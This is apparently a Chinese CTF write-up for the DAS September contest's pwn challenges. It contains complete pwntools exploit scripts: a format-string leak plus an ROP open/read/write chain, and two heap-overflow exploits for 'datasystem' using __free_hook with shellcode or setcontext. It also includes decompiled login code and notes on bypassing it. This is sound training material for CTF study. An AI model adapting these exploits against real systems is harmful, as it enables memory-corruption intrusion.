das9月WP

Posted on | In | Visitors: |
das9月赛

就出了两道题,hahapwn还是赛后出的,难受

hehepwn

思路泄露libc_base + rop

hahapwn

这个题非常离谱,禁用了execve,一开始我用本地的libc.so.6能打通本地(并且read、write也能用)
然后用它给的libc结果就打不通了,主要是因为他给的libc中的read、write函数不能用,
elf文件只有puts能用,不能用sys_write
思路是格式化字符串泄露canary + libc + stack,然后,rop进行orw

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
from pwn import *

p = remote("node4.buuoj.cn",25546)
libc = ELF("./libc.so.6")

#context.log_level = "debug"

'''
libc_path = "./libc.so.6"
ld_path = "/home/giantbranch/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so"
libc = ELF("./libc.so.6")
p = process([ld_path, "./pwn"], env={"LD_PRELOAD":libc_path})
'''

elf = ELF("./pwn")

context.arch = "amd64"
context.os = "linux"

payload = "aaaaaaaa"  + "%37$p" + "%39$p" + "%36$p"
p.sendlineafter("Welcome! What is your name?\n",payload)
p.recvuntil("a"*8)

canary = int(p.recvuntil("00"),16)
libc_base = int(p.recv(14),16) - 240 - libc.sym["__libc_start_main"]

stack = int(p.recv(14),16)

bss = 0x601098
pop_rdi = 0x0000000000400943#pop rdi ; ret
pop_rsi = 0x0000000000400941#pop rsi ; pop r15 ; ret
leave_ret = 0x00000000004007b6#leave;ret
ret = 0x0000000000400599#ret	
rdx = libc_base + 0x0000000000001b92
pop_rax = libc_base + 0x000000000003a738#pop rax;ret
syscall = 0x00000000000bc3f5 + libc_base#syscall;ret
	
open_ad = libc_base + libc.sym["open"]
write = elf.plt["puts"]

flag_ad = stack - 416
read_ad = stack + 8

log.info("canary:   " + hex(canary))
log.info("libc_base: " + hex(libc_base))
log.info("stack: " + hex(stack))
log.info("flag_ad: " + hex(flag_ad))

payload = "/flag\x00"
payload = payload.ljust(0x68,"a")

payload += p64(canary) +  "aaaa"*2 + p64(pop_rdi) + p64(flag_ad)
payload += p64(pop_rsi) + p64(0) + p64(0)
payload += p64(pop_rax) + p64(2) + p64(syscall)

payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss) + p64(0)
payload += p64(rdx) + p64(0x100)
payload += p64(pop_rax) + p64(0) + p64(syscall)

payload += p64(pop_rdi) + p64(bss)
payload += p64(write)

p.sendlineafter("What can we help you?\n",payload)
print p.recv()

3.datasystem

这个题除了前面那个passwd验证,其他的就比较常规了,这个题求出了的队要的脚本才出的
passwd输入”c”* 0x20能进入菜单(ida里这一部分的逻辑非常复杂)
add函数里面有溢出,并且之前分配了rwx段
shellcode 做法如下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
from pwn import *

p = process("./pwn")

p = remote("node4.buuoj.cn",26220)
#context.log_level = "debug"

libc = ELF("./libc-2.27.so")

context.arch = "amd64"
context.os = "linux"
#gdb.attach(p)

payload = "admin"
p.recvuntil("please input username: ")
p.send(payload)

p.recvuntil("please input password: ")
p.send("c"*0x20)

def add(size,con):
	p.recvuntil(">> :")
	p.sendline("1")
	p.recvuntil("Size: \n")
	p.sendline(str(size))
	p.recvuntil("what's your Content: \n")
	p.send(con)

def free(idx):
	p.recvuntil(">> :")
	p.sendline("2")
	p.recvuntil("Index:\n")
	p.sendline(str(idx))

def show(idx):
	p.recvuntil(">> :")
	p.sendline("3")
	p.recvuntil("Index:\n")
	p.sendline(str(idx))

def edit(idx,con):
	p.recvuntil(">> :")
	p.sendline("4")	
	p.recvuntil("Index:\n")
	p.sendline(str(idx))
	p.recvuntil("Content:\n")
	p.send(con)

add(0x28,"a"*0x28)#0
add(0x480,"aaaa")#1
add(0x28,"aaaa")#2

free(1)
free(0)
add(0x28,"a"*0x30)#0
show(0)
p.recvuntil("a"*0x30)
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 96 -0x10 - libc.sym["__malloc_hook"]
log.info("ad: " + hex(libc_base))
free_hook = libc_base + libc.sym["__free_hook"]
log.info("free_hook: " + hex(free_hook))
rwx = 0x23330000

free(0)
add(0x28,"a"*0x28 + p64(0x491))#0
add(0x10,"aaa")#1
add(0x20,"aaa")#3
free(1)
free(0)
add(0x28,"a"*0x28 + p64(0x21) + p64(rwx))
add(0x10,"aaa")

shellcode = shellcraft.open("./flag")
shellcode += shellcraft.read(3,rwx + 0x200,0x100)
shellcode += shellcraft.write(0,rwx + 0x200,0x100)

add(0x10,asm(shellcode))

free(3)
free(0)
add(0x28,"a"*0x28 + p64(0x21) + p64(0)*3 + p64(0x31) + p64(free_hook))

add(0x20,"aaaa")
add(0x20,p64(rwx))
#gdb.attach(p)
free(0)

p.interactive()

setcontext的做法如下(一开始没看到有个rwx的段)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
from pwn import *

p = process("./pwn")

#context.log_level = "debug"

libc = ELF("/lib/x86_64-linux-gnu/libc-2.27.so")

context.arch = "amd64"
context.os = "linux"
#gdb.attach(p)

payload = "admin"
p.recvuntil("please input username: ")
p.send(payload)

p.recvuntil("please input password: ")
p.send("c"*0x20)

def add(size,con):
	p.recvuntil(">> :")
	p.sendline("1")
	p.recvuntil("Size: \n")
	p.sendline(str(size))
	p.recvuntil("what's your Content: \n")
	p.send(con)

def free(idx):
	p.recvuntil(">> :")
	p.sendline("2")
	p.recvuntil("Index:\n")
	p.sendline(str(idx))

def show(idx):
	p.recvuntil(">> :")
	p.sendline("3")
	p.recvuntil("Index:\n")
	p.sendline(str(idx))

def edit(idx,con):
	p.recvuntil(">> :")
	p.sendline("4")	
	p.recvuntil("Index:\n")
	p.sendline(str(idx))
	p.recvuntil("Content:\n")
	p.send(con)

add(0x28,"a"*0x28)#0
add(0x480,"aaaa")#1
add(0x28,"aaaa")#2

free(1)
free(0)
add(0x28,"a"*0x30)#0
show(0)
p.recvuntil("a"*0x30)
libc_base = u64(p.recv(6).ljust(8,"\x00")) - 96 -0x10 - libc.sym["__malloc_hook"]
log.info("ad: " + hex(libc_base))
free_hook = libc_base + libc.sym["__free_hook"]
sys_ad = libc_base + libc.sym["system"]
setcontext = libc_base + libc.sym["setcontext"] + 53
open = libc_base + libc.sym["open"]
read = libc_base + libc.sym["read"]
write = libc_base + libc.sym["puts"]

rax = libc_base + 0x0000000000043a78
rdi = libc_base + 0x000000000002155f
rsi = libc_base + 0x0000000000023e8a
rdx = libc_base + 0x0000000000001b96
ret = libc_base + 0x00000000000008aa

free(0)
add(0x28,"a"*0x28 + p64(0x491))#0
add(0x100,"aaaa")#1
add(0x100,"bbbb")#3
free(3)
free(1)
free(0)
add(0x28,"a"*0x30)#0
show(0)
p.recvuntil("a"*0x30)
heap_ad = u64(p.recv(6).ljust(8,"\x00"))
log.info("heap_ad: " + hex(heap_ad))
log.info("free_hook: " + hex(free_hook))
log.info("setcontext:" + hex(setcontext))

flag_ad = heap_ad - 0x140
pay_ad = heap_ad - 0x110

payload = p64(rdi) + p64(flag_ad)
payload += p64(rsi) + p64(0)
payload += p64(rax) + p64(2) + p64(open)

payload += p64(rdi) + p64(3) + p64(rsi) + p64(heap_ad + 0x300)
payload += p64(rdx) + p64(0x100)
payload += p64(rax) + p64(0) + p64(read)

payload += p64(rax) + p64(1)
payload += p64(rdi) + p64(heap_ad + 0x300)
payload += p64(write)
payload = payload.ljust(0x100,"\x00") + p64(0x111) + p64(free_hook)

frame = SigreturnFrame()
frame.rsp = pay_ad + 8
frame.rip = ret

free(0)

add(0x28,"./flag\x00\x00" + "a"*0x20 + p64(0x111))#0
add(0x100,"a"*8 + payload)#1

add(0x100,str(frame))#3
add(0x100,p64(setcontext))#4
#gdb.attach(p)

free(3)
p.interactive()

关于datasystem前面的分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
__int64 sub_2170()
{
  __m128i *v0; // r14
  int v1; // eax
  __m128i v2; // xmm0
  unsigned int v3; // eax
  __int64 v4; // r14
  __int32 v5; // ecx
  unsigned int v6; // er12
  __int32 v7; // er15
  unsigned __int64 v8; // kr00_8
  unsigned __int32 v9; // er14
  __int8 v10; // r13
  __m128i *v11; // rsi
  __int64 v12; // rax
  unsigned int v13; // ebp
  unsigned int v14; // er12
  __int128 *v15; // rdi
  __int64 **v16; // rsi
  unsigned int v17; // er14
  unsigned int v18; // er14
  unsigned int v19; // eax
  __int128 *v20; // rsi
  unsigned int v21; // edx
  __int64 *v22; // rax
  int v23; // eax
  unsigned int v24; // edx
  __int64 v26; // r15
  __int64 v27; // rcx
  unsigned __int64 v28; // rdi
  char *v29; // rsi
  char *v30; // rax
  unsigned int v31; // ecx
  unsigned int v32; // edx
  unsigned int v33; // esi
  __int64 v34; // rcx
  unsigned __int64 v35; // rdx
  char *v36; // rsi
  char *v37; // rdi
  unsigned int v38; // eax
  unsigned int v39; // eax
  unsigned int v40; // ecx
  __int64 v41; // rsi
  unsigned int v42; // er13
  unsigned __int64 v43; // rax
  char *v44; // rdi
  char *v45; // r8
  unsigned int v46; // edi
  unsigned int v47; // edi
  unsigned int v48; // ecx
  __int64 v49; // rsi
  unsigned __int32 v50; // [rsp+8h] [rbp-130h]
  unsigned __int32 v51; // [rsp+14h] [rbp-124h]
  __m128i v52; // [rsp+20h] [rbp-118h] BYREF
  int v53; // [rsp+30h] [rbp-108h]
  int v54; // [rsp+34h] [rbp-104h]
  __m128i v55[4]; // [rsp+38h] [rbp-100h] BYREF
  __int64 v56; // [rsp+78h] [rbp-C0h] BYREF
  __int64 s1; // [rsp+80h] [rbp-B8h] BYREF
  int v58; // [rsp+88h] [rbp-B0h]
  int v59; // [rsp+8Ch] [rbp-ACh]
  char buf[32]; // [rsp+90h] [rbp-A8h] BYREF
  __m128i src; // [rsp+B0h] [rbp-88h] BYREF
  __m128i v62; // [rsp+C0h] [rbp-78h] BYREF
  char s2[16]; // [rsp+D0h] [rbp-68h] BYREF
  __m128i v64; // [rsp+E0h] [rbp-58h] BYREF
  char v65; // [rsp+F0h] [rbp-48h] BYREF
  unsigned __int64 v66; // [rsp+F8h] [rbp-40h]

  *(__m128i *)s2 = _mm_load_si128((const __m128i *)&xmmword_3100);
  v65 = 0;
  v0 = &src;
  v64 = _mm_load_si128((const __m128i *)&xmmword_3110);
  __printf_chk(1LL, "please input username: ");
  read(0, buf, 0x20uLL);
  __printf_chk(1LL, "please input password: ");
  v1 = read(0, &src, 0x20uLL);
  v2 = _mm_load_si128((const __m128i *)&xmmword_30E0);
  src.m128i_i8[v1] = 0;//将最后置0
  v53 = 0x98BADCFE;
  v52 = v2;
  v54 = 0x10325476;
  do
  {
    v0 = (__m128i *)((char *)v0 + 4);
    v3 = ~v0[-1].m128i_i32[3] & (v0[-1].m128i_i32[3] - 16843009) & 0x80808080;
  }
  while ( !v3 );
  if ( (~v0[-1].m128i_i32[3] & (v0[-1].m128i_i32[3] - 16843009) & 0x8080) == 0 )
    LOBYTE(v3) = (~v0[-1].m128i_i32[3] & (v0[-1].m128i_i32[3] - 16843009) & 0x80808080) >> 16;
  if ( (~v0[-1].m128i_i32[3] & (v0[-1].m128i_i32[3] - 16843009) & 0x8080) == 0 )
    v0 = (__m128i *)((char *)v0 + 2);
  v4 = (char *)v0 - __CFADD__((_BYTE)v3, (_BYTE)v3) - 3 - (char *)&src;
  v5 = 8 * v4;
  v6 = v4;
  v8 = 8LL * (unsigned int)v4;
  v7 = HIDWORD(v8);
  v52.m128i_i32[0] = v8;
  v52.m128i_i32[1] = (unsigned int)v4 >> 29;
  if ( (unsigned int)v4 > 0x3F )
  {
    v42 = 128;
    v55[0] = _mm_load_si128(&src);
    v55[1] = _mm_load_si128(&v62);
    v55[2] = _mm_load_si128((const __m128i *)s2);
    v55[3] = _mm_load_si128(&v64);
    sub_1350(&v52.m128i_u64[1]);
    if ( (unsigned int)v4 > 0x7F )
    {
      while ( 1 )
      {
        sub_1350(&v52.m128i_u64[1]);
        if ( (unsigned int)v4 < v42 + 64 )
          break;
        v42 += 64;
      }
      v7 = v52.m128i_i32[1];
      v6 = v4 - v42;
      v11 = (__m128i *)((char *)&src + v42);
      v5 = v52.m128i_i32[0];
      v9 = HIWORD(v52.m128i_i32[1]);
      v10 = v52.m128i_i8[5];
      v51 = HIBYTE(v52.m128i_i32[1]);
    }
    else
    {
      v7 = v52.m128i_i32[1];
      v5 = v52.m128i_i32[0];
      v6 = v4 - 64;
      v11 = (__m128i *)&v65;
      v9 = HIWORD(v52.m128i_i32[1]);
      v10 = v52.m128i_i8[5];
      v51 = HIBYTE(v52.m128i_i32[1]);
    }
  }
  else
  {
    LOBYTE(v51) = 0;
    LOBYTE(v9) = 0;
    v10 = 0;
    v11 = &src;
  }
  v50 = v5;
  memcpy(v55, v11, v6);
  v12 = (v50 >> 3) & 0x3F;
  if ( (unsigned int)v12 <= 0x37 )
    v13 = 56 - v12;
  else
    v13 = 120 - v12;
  LODWORD(v56) = v50;
  v14 = 64 - v12;
  BYTE4(v56) = v7;
  BYTE5(v56) = v10;
  BYTE6(v56) = v9;
  HIBYTE(v56) = v51;
  v52.m128i_i32[0] = 8 * v13 + v50;
  if ( __CFADD__(8 * v13, v50) )
    v52.m128i_i32[1] = v7 + 1;
  v15 = (__int128 *)((char *)v55 + v12);
  v16 = &off_5020;
  if ( v13 >= v14 )
  {
    if ( v14 >= 8 )
    {
      *(_QWORD *)v15 = off_5020;
      *(_QWORD *)((char *)v15 + v14 - 8) = *(__int64 **)((char *)&off_5020 + v14 - 8);
      v43 = ((unsigned __int64)&v52 + v12 + 32) & 0xFFFFFFFFFFFFFFF8LL;
      v44 = (char *)v15 - v43;
      v45 = (char *)((char *)&off_5020 - v44);
      v46 = (v14 + (_DWORD)v44) & 0xFFFFFFF8;
      if ( v46 >= 8 )
      {
        v47 = v46 & 0xFFFFFFF8;
        v48 = 0;
        do
        {
          v49 = v48;
          v48 += 8;
          *(_QWORD *)(v43 + v49) = *(_QWORD *)&v45[v49];
        }
        while ( v48 < v47 );
      }
    }
    else if ( (v14 & 4) != 0 )
    {
      *(_DWORD *)v15 = (_DWORD)off_5020;
      *(_DWORD *)((char *)v15 + v14 - 4) = *(_DWORD *)((char *)&off_5020 + v14 - 4);
    }
    else if ( v14 )
    {
      *(_BYTE *)v15 = (_BYTE)off_5020;
      if ( (v14 & 2) != 0 )
        *(_WORD *)((char *)v15 + v14 - 2) = *(_WORD *)((char *)&off_5020 + v14 - 2);
    }
    v13 -= v14;
    sub_1350(&v52.m128i_u64[1]);
    v15 = (__int128 *)v55;
    v16 = (__int64 **)((char *)&off_5020 + v14);
  }
  memcpy(v15, v16, v13);
  v17 = (unsigned __int32)v52.m128i_i32[0] >> 3;
  v52.m128i_i32[0] += 64;
  v18 = v17 & 0x3F;
  v19 = 64 - v18;
  if ( v52.m128i_i32[0] <= 0x3Fu )
    ++v52.m128i_i32[1];
  v20 = (__int128 *)((char *)v55 + v18);
  if ( v19 > 8 )
  {
    v21 = 8;
    v22 = &v56;
LABEL_32://这里再往上逆推,然后又到了下面
    *(_QWORD *)v20 = *v22;
    *(_QWORD *)((char *)v20 + v21 - 8) = *(__int64 *)((char *)v22 + v21 - 8);
    v28 = ((unsigned __int64)v20 + 8) & 0xFFFFFFFFFFFFFFF8LL;
    v29 = (char *)v20 - v28;
    v30 = (char *)((char *)v22 - v29);
    v31 = (v21 + (_DWORD)v29) & 0xFFFFFFF8;
    if ( v31 >= 8 )
    {
      v32 = 0;
      v33 = v31 & 0xFFFFFFF8;
      do
      {
        v34 = v32;
        v32 += 8;
        *(_QWORD *)(v28 + v34) = *(_QWORD *)&v30[v34];
      }
      while ( v32 < v33 );
    }
    goto LABEL_22;//注意看这里
  }
  v26 = v19;
  if ( v19 >= 8 )
  {
    *(_QWORD *)v20 = v56;
    *(_QWORD *)((char *)v20 + v19 - 8) = *(__int64 *)((char *)&v56 + v19 - 8);
    v35 = ((unsigned __int64)&v52 + v18 + 32) & 0xFFFFFFFFFFFFFFF8LL;
    v36 = (char *)v20 - v35;
    v37 = (char *)((char *)&v56 - v36);
    v38 = ((_DWORD)v36 + v19) & 0xFFFFFFF8;
    if ( v38 >= 8 )
    {
      v39 = v38 & 0xFFFFFFF8;
      v40 = 0;
      do
      {
        v41 = v40;
        v40 += 8;
        *(_QWORD *)(v35 + v41) = *(_QWORD *)&v37[v41];
      }
      while ( v40 < v39 );
    }
  }
  else if ( (v19 & 4) != 0 )
  {
    *(_DWORD *)v20 = v56;
    *(_DWORD *)((char *)v20 + v19 - 4) = *(_DWORD *)((char *)&v56 + v19 - 4);
  }
  else if ( v19 )
  {
    *(_BYTE *)v20 = v56;
    if ( (v19 & 2) != 0 )
      *(_WORD *)((char *)v20 + v19 - 2) = *(_WORD *)((char *)&v56 + v19 - 2);
  }
  sub_1350(&v52.m128i_u64[1]);
  v21 = v18 - 56;
  v22 = (__int64 *)((char *)&v56 + v26);
  v20 = (__int128 *)v55;
  v27 = v18 - 56;
  if ( v18 - 56 >= 8 )
    goto LABEL_32;//这里
  if ( (v21 & 4) != 0 )
  {
    v55[0].m128i_i32[0] = *(_DWORD *)v22;
    *(int *)((char *)&v54 + v27) = *(_DWORD *)((char *)v22 + v27 - 4);
  }
  else if ( v18 != 56 )
  {
    v55[0].m128i_i8[0] = *(_BYTE *)v22;
    if ( (((_BYTE)v18 - 56) & 2) != 0 )
      *(__int16 *)((char *)&v55[0].m128i_i16[-1] + v27) = *(_WORD *)((char *)v22 + v27 - 2);
  }
LABEL_22://从这里往上逆推
  s1 = v52.m128i_i64[1];
  v58 = v53;
  v59 = v54;
  if ( strcmp(buf, "admin") || (v23 = strcmp((const char *)&s1, s2), v24 = 1, v23) )
  //需要绕过这里才能进入菜单
  //buf必须为admin,s1,s2必须相等(或者都被\x00截断)
  {
    puts("Login Fail");
    v24 = 0;
  }
  return v24;
}

__ m128i类型的变量大小为16个字节并且与地址对齐